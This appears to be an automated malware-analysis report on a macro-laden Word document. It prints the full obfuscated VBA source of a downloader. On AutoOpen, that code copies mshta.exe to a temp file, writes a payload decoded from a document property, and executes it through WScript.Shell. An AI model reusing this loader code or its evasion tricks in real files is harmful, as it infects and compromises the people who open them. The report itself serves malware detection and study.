Verdict: MALICIOUS
Risk Score: 138
Heuristics: 6
- ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
- VBA project inside OOXML [medium, OOXML_VBA; 3 related findings]: Document contains a VBA project (VBA macros present)
  - CreateObject call [high, OLE_VBA_CREATEOBJ]. Matched line in script: `Call CreateObject("ws" + aVfEjo + "ell").run(a3vhqc)`
  - AutoOpen macro [low, OLE_VBA_AUTOOPEN]. Matched line in script: `Sub AutoOpen()`
  - Environ() call (env variable access) [low, OLE_VBA_ENVIRON]. Matched line in script: `aHDWhJ = Environ(aftS0N)`
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/ink (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2017/model3d (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2018/wordml/cex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2016/wordml/cid (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2018/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/ (in document text: OOXML body / shared strings)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text: OOXML body / shared strings)
  - http://purl.org/dc/elements/1.1/ (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/photoshop/1.0/ (in document text: OOXML body / shared strings)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11473 bytes | aada9466c451f0f49184ee7cd5e9cabcef78f84710c18f392aebe525aba1f33c |
Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aPVeG"
Sub AutoOpen()
' Cant defunct se
' Trackless defendant rapacious sunny inspired enclose
' Odorous aztec lets
' Trowel abs electricity
' Exposure saintly
' Showed terra chest octavo tolerant
' Maudlin antibody guitar hygienic pix
' Guy neapolitan buzzard compounds scotia prematurely
' Paintings considerable appointment fallible reported katie
' Fido verger lending
' Blackberry hepatitis
aHp9QA
End Sub
Attribute VB_Name = "ac6xZ"
Public Const axOvH As String = ""
Public Const aINVm As Integer = 2166 - 2153
Public Const aIgWCc As String = "1ridn1iw1"
Public Const aEwB5 As String = "231met1sys1"
Public Const arTI57 As String = "p1m1e1t"
Public Const aVfEjo As String = "cript.sh"
Function aUgiI()
End Function
Sub aRY8BT(ajDfe)
' Owner fool eclipse
' Circuits chew ministers eating
' Permanence guild organist electrode illustrations
' Cordova mummy barnet adjutant
' Steeple eliminate consoles lick accomplishing wider
' Scope means delirious deputy instance cramp
' Achievement diadem pillow
' Protected refers hawk enables
' Shant apropos skirts civic
' Preparing callous
' Crest vote
' Use winners
' Dumb
' Synagogue lag locust inception absently
' Dawns unconcerned joins theocracy
' Unmarked emphasize consistent
' Median valise kentucky stores
' Bungalow nutter miniature reveals kurt
' Facilities halifax prelate abstractions europa
' Protocol crutch fatty manhattan
' Overall
' Deaden trial german
' Advisor choler ogre stars
' Guidelines
' Cow poplar
' Anterior supervisor fingering
' Gary appease
' Designers item
' Reopen los oscar
' Brands bubble stigma atlantic
' Spinach demonstrated murder rid viewpoint
' Jacket
' Modern ep libs ecstatic binding outlawed
' Chlorine spurn gymnastics
End Sub
Function apnQ7m(a2nD1q)
apnQ7m = ActiveDocument.BuiltInDocumentProperties(a2nD1q)
End Function
Public Sub aFWou8()
amL2S
End Sub
Public Sub aoEO6()
azl4W
End Sub
Attribute VB_Name = "aFwMYV"
Public Function a6MfL0(akgLrj, aiskcv)
' Crown nail
FileNumber = FreeFile
Open akgLrj For Output As #FileNumber
' Benignant fluently
Print #FileNumber, aiskcv
Close #FileNumber
End Function
Sub aUoks(atOXAG, aNLDI)
' Cleaners discontinued gravy sprightly turret sunset
' Irwin sleeper reynard repairs minion
' Decor mourner englishwoman placard ignoramus abscess
' Zeb ostentatious routing seaside pediatric jane
' Dingle calm ticklish adapted rake
' Shanghai
' Unavoidable absolutely raises arousing recover abatement
' Src inviolable associating
' Jasmine omniscient coeval ode honors veda care
' Sealed tiles gui
' Nano
' Stays archived unnecessarily string breakfast
' Concave pickle imbibe passed
' Verbal awkwardness procreation
' Initial
' Souvenir yourself grill forceful
' Boxed censor
' Botanist georgetown
' Chassis v bronze
' Dates
' Irwin denounce birth acorn
' En- loathsome permits
FileCopy atOXAG, aNLDI
End Sub
Function awr74I(aBT6tK)
' Developer
' Hectic stupefaction
' Fifth sky undoing
' Hollow westminster telescope ensign electorate
' Contracts payment investigated
' Easier switch menial
' Injured agreements dsl
' Lazy overflow almanac foray
' Unknown amateur repugnance lurch
' Anthea platoon
awr74I = aBT6tK
End Function
Function a83V9(aBT6tK) As String
Dim aYbfea As Long
Dim aueoc As Integer
Dim aniB35 As Integer
For aYbfea = 1 To Len(aBT6tK)
aniB35 = 0
aERVb = Mid(aBT6tK, aYbfea, 1)
' Stewart cc grain compiler
' Computational storied tedium libyan
' Thumbs faqs curtail mercy
' Outdo jul delivered kong boxer
' Sloppy millennium
' Sticks tarts
' Cornish dimensions cole
' Hawaii scanned laden
' Locker richard pressing warrior ferry
' Vhs uzbekistan civil agape
aueoc = Asc(aERVb)
If (aueoc > aq8k6(4126 - 4125) And aueoc < aq8k6(10192 / 5096)) Or (aueoc > aq8k6(-7805 + 7808) And aueoc < aq8k6(6994 - 6990)) Then
' Beautiful acceptable laity dominican brighton
' Perishing forger matched pout
' Happening configuring oracular subscriptions
' Hoc clockwork pump
' Celt undisputed concentrate moderately incision
' Pace haughtily stockholm dictionaries
' Mattress onlooker
' Vocational diana
' Fiftieth ruse lake
' Ram na
' Vegas sew
aniB35 = aINVm
' Plastic good transparency bi
aueoc = awa9t(aueoc, aniB35)
If aueoc < aq8k6(5) And aueoc > 83 Then
aueoc = aCKyG(aueoc)
ElseIf aueoc < -283 + 348 Then
aueoc = aCKyG(aueoc)
End If
End If
ahsHb = aacdg(aueoc)
Mid$(aBT6tK, aYbfea, 1) = awr74I(ahsHb)
Next aYbfea
a83V9 = aBT6tK
End Function
Attribute VB_Name = "ayoUR"
Function aHO829(a4T9x)
' Ire mightnt darken
' Reciprocity dolt
' Applies suns fg
' Dearborn claims
' Serenade ga wishing pantry cabaret
' Catch container cast
' Viewpicture
' Clarity rely ukraine jackson waves dies hero
' Tea networking townships figure
' Finishing footwear
' Exhilaration philanthropic shakespearean indigenous viscera
' Punctilious freak pj
' Infinitive salient coiled tits
' Footwear urn
' Mysimon titanic
' Spell
' Fellow recognizable
' Trend mistook okay side
' Abhor bracket passing
' Unchanging lebanon hight distillation
' Wages legally graham unavailing stage classified
' Triangular medline heifer str
a2G56m = a4T9x
aEcpO = Len(a2G56m)
For aCwAc = 0 To aEcpO - 1
' Solidity bulldog inclusive plaintiff pacific
' Answer academies xx
' Cad mica
' Steven sustained av farcical
' Metaphor phosphoric strikes hinting oasis
' Rumania load everyday
' Carnival flounder alias spelling parsonage
' Super translucent disposition
' Threaded collaboration hose assumption aphorism
' Biographical ciao arsenal functional andros
' Elsewhere
' Pitch company builders honor surprised paulo
a6Xmt = a6Xmt & Mid(a2G56m, (aEcpO - aCwAc), 1)
Next aCwAc
aHO829 = a6Xmt
End Function
Public Function aSzWfu(awfM5)
' Beetles salzburg
' Crape rebus specify
' Arbiter volvo cleanly womens
' Dicke darius facility groups
' Commensurate sight civic syracuse attraction
' Weal prescribe across holders
' Businesses conduit islam
' Wizened immaculate bawl rules abner
' Ri wield literature genre
' Arc accounting
' Ghost guestbook owns
aSzWfu = Replace(awfM5, axOvH, "")
End Function
Sub aHp9QA()
' Arsenic healthy
' Slave-girl teller gretchen
' Keynote consistently algiers prank impaired
' Isabelle golden gc shack
' Aquatic
' Cartridges wr usher
' Epidemic lukewarm
' Trapper quietude jessica
' Boatswain ozone listening
' Minds harmonic
' Guiana hewlett incautious berber
aFWou8
' Demo wrest corkscrew sucking
' Fattening bathroom putrid briefing
' Strengths grinder echoing
' Notices
' Frontispiece pointer heraldic
' Thereat
' Conclusions arabic japanese remind
' Matrix nursing
' Bestial simon occurrence persian side
' Cadet inkling
' Sandwich regent co library
' Olivia rating
' Twenty-ninth armenia
' Hearings irritate mexican unattended
' Cooperative circuitous
' Spoke encore biology greene initial
' Entries
' Greater predict
' Oyster leakage remove malevolent officer
' Cage playing riders
' Rely monster evangelist gloucestershire
' Scripts configured belinda cake pitiable tottering
aoEO6
' Helps overdo unchallenged reflects
' Mp fox influence venom
' Deaden notes
' Gregarious somebody gleefully
' Forecastle needed dangling
' Acquiesce
' Fireman march nominations gillian luxembourg
' Malaysia dissertation bastion extent etc
' Sbjct creates shrewdly endless fy
' Chapel pears bravo
' Coach annihilation transitive beech
Call CreateObject("ws" + aVfEjo + "ell").run(a3vhqc)
End Sub
Attribute VB_Name = "arzlh"
Function aHDWhJ(aftS0N)
' Nectar translated jugs
' Selective
' Pears dock emily
' Infrared logitech conservation slash
' Completes recipe grafting
' Heraldry mechanical
' Clam effectiveness
' Terrifying unformed turban detailed forwarding
' Ict immediately
' Sift stars desperate depth transmitter collective herald
' Options disable
aHDWhJ = Environ(aftS0N)
End Function
Function al189()
' Behavioral
' Mj mystery jolt pope
' Internationally filing cannonade paraphernalia
' Please solution
' Photography brats retailers smithsonian foothold
' Jacob crowd elope behavioral
' Emporium retrieve capacity suspension incentives hives tough
' Pliant japanese
' Asthma dec allah allergy biodiversity
' Belongs pistil failing
' Elopement
With Application
al189 = .PathSeparator
End With
End Function
Function a6SPR(aj0OA)
a9xe2 = VBA.Split(aHO829("lmth.ni|moc.ni|exe.athsm"), "|")
' Birds aurora catarrh stockings
' Ruffian shared
' Accomplish shyness sinuous intangible
' Parcel nude unfavorable
' Compassionate barrage theaters
' Bile ad confusion
' Flatterer creeper opinions breaking strictly emendation cfr
' Sheep maltreated units knitted would-be secretariat
' All perpetuate sewer onslaught
' Simpson quire pinafore annotated brewery
' Dejected sustainability thereabout
' Cell
' Buyers synonym appropriations
Select Case aj0OA
' Lloyd bermuda attempts
' Ajax sprouted repudiate hamlet
' Tuning submissions wanted what vaulting broad
' Easy pawnbroker
' Absolutely laplace
' Adjacent freight
' Warm-hearted dame surf tablet
' Transept sustainable
' Springs combatant cnn
' 911 sacrilege saddam stitch
' Watson
Case 0:
' Bureaucracy merry deduction
' Chary paintings world
' Porn patriarch proposed seashore serial tattoo rome
' Fog
' Preliminary determined relatives humid financial
' Maya shove cavalcade propensity bleached dow
' Warring emerald godless homespun
' Wealth inbox
' Consultancy loathsome plays commemoration stucco
' Mantua leading mesquite
' Entities
a6SPR = aHDWhJ(Replace(aHO829(aIgWCc), "1", "")) & al189 & Replace(aHO829(aEwB5), "1", "") & al189 & a9xe2(0)
' Daughters albion colt higher mustang bid
Case 1:
' Below summed athens european ranges siliceous
a6SPR = aHDWhJ(Replace(aHO829(arTI57), "1", "")) & al189 & a9xe2(1)
Case 2:
a6SPR = aHDWhJ(Replace(aHO829(arTI57), "1", "")) & al189 & a9xe2(2)
End Select
End Function
Sub azl4W()
a6ukP = aKVTw2(a6SPR(2))
a6MfL0 a6ukP, a83V9(apnQ7m("category"))
End Sub
Attribute VB_Name = "aTmN3"
Function aGsWq(a13doQ)
aGsWq = (aSzWfu(a13doQ))
End Function
Function asmDM(aO7rg)
' Room
asmDM = (aSzWfu(aO7rg))
End Function
Function aKVTw2(aKidHD)
' Routines clark
aKVTw2 = (aSzWfu(aKidHD))
End Function
Function a3vhqc()
afN8C7 = asmDM(a6SPR(1))
aRWZGB = aKVTw2(a6SPR(2))
a3vhqc = afN8C7 & " " & aRWZGB
End Function
Attribute VB_Name = "amoUM9"
Sub amL2S()
andAO = aGsWq(a6SPR(0))
avgsao = asmDM(a6SPR(1))
aUoks andAO, avgsao
End Sub
Function aCKyG(aw2mIS)
aCKyG = aw2mIS + -1165 + 1191
End Function
Function aq8k6(a0YEVp)
If a0YEVp = 0 Then
aq8k6 = 15101 - 15100
ElseIf a0YEVp = 1 Then
aq8k6 = -139 + 203
ElseIf a0YEVp = 2 Then
aq8k6 = -220 + 311
ElseIf a0YEVp = 3 Then
aq8k6 = 189 - 93
ElseIf a0YEVp = 4 Then
aq8k6 = 250 - 127
ElseIf a0YEVp = 5 Then
aq8k6 = -27 + 124
Else
aq8k6 = 512 * 2
End If
End Function
Function awa9t(aw2mIS, a1U5D)
awa9t = aw2mIS - a1U5D
End Function
Function aacdg(aw2mIS)
aacdg = VBA.ChrW(aw2mIS)
' Unimpeachable johnston
End Function

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 49152 bytes | 081a058c0abdaf8b6402531fe08172caaf5768a64aa2dfe39db5d9a619cd577e |